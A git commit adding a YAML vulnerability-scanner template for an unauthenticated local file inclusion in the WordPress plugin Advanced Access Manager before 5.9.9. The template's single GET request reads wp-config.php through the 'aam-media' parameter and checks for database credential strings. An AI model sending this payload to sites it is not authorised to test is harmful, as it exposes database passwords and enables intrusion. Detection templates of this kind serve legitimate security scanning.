Create advanced-access-manager-plugin-lfi.yaml

patch-1
Roberto Nunes 2021-10-10 21:22:32 +09:00 committed by GitHub
parent 55678cff0c
commit 93fe5a0784
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: advanced-access-manager-plugin-lfi
info:
name: Advanced Access Manager < 5.9.9 - Unauthenticated Local File Inclusion
author: 0x_Akoko
severity: high
tags: wordpress,wp-plugin,lfi,wp
reference: https://wpscan.com/vulnerability/9873
requests:
- method: GET
path:
- '{{BaseURL}}/?aam-media=wp-config.php '
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200